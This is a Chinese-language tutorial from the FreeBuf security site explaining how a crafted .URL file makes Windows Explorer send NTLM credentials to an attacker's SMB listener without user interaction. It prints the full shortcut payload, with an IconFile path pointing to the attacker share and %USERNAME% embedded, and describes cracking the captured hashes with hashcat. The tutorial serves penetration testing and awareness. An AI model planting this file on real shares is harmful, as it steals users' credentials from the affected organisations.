freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

一种无需用户交互捕获哈希的方法
secist 2018-10-07 07:00:13 350614

这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。

以下内容摘自@insertscript的帖子:

“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“(https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html

首先,我们在攻击机上设置SMBListener(通常情况下在内网环境中,大多数公司都会阻止SMB流量出站)。

1_fQk9ruNetDY_W2mjcmGuRw.png

接着,我们在文件共享上创建一个文本文件。(创建文件后,你可以将其放在任何共享上)。

2_ojHHReMZNe_wptxFkhJzUw.png

将以下内容粘贴到文本文件中:

[InternetShortcut]

URL=whatever

WorkingDirectory=whatever

IconFile=\\PutYourSmbListenerShareHere\%USERNAME%.icon

IconIndex=1

以上你只需将IconFile PATH替换为你在SMBServer,Responder或Inveigh中设置的共享即可。注意:这里的%USERNAME%。icon不要改动。如下:

1_QLEF1Z4Nxy-GQ-VfipqzJA.png

现在,请确保你已勾选文件名扩展和隐藏文件选项。

1_C8fpG9Vax8N9tqqbWXpE-Q.png

使用.URL扩展重命名文件注意:当使用相同文件名时,将导致无法正常工作因此,建议大家每次都只创建唯一的文件名(例如1.url,2.url等)!

1_M2cD10jjIKMqNFzhG_wP6g.png

重命名后应该看起来像下面这样:

1_3d_YzY0RiuFhM1A__jKwrA.png

此时,在你的smb listener应该已经获取到了一个连接!

1_1dLpEk4FL0MKuQsyTdQjxQ.png

现在,任何人只要访问该共享,都将尝试自动的向你的SMB listener进行身份验证。

复制哈希并使用hashcat破解。

1_fCcNzzty8DFieV3Rvc6JBA.png

将其粘贴到文件中

10_jGAre-VqZi-Qy2sGbsZ_Dg.png

启动hashcat(希望密码包含在你的字典列表中)

1_O4Yw2yBO-reeoKgTh5l7nw.png

成功解出了密码!

1_pWAvweKQObHkYcCPR5aiNA.png

最后,感谢@insertscript的分享!也希望大家可以在微博上关注我(@_markmo_),我会第一时间向大家分享我学到的东西,就像其他人给予我的一样!

*参考来源:medium,FB小编secist编译,转载请注明来自FreeBuf.COM

# 哈希
本文为 secist 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
secist LV.9
每个人的心中都有一个梦。。
  • 369 文章数
  • 267 关注者
ATTCK-PenTester-Book:根据ATT&CK知识体系编制的长达400页的渗透手册
2020-02-10
Sniffle: 蓝牙5和4.x LE嗅探器
2019-11-23
Docem:向docx odt pptx等文件中嵌入XXE或XSS Payload
2019-11-11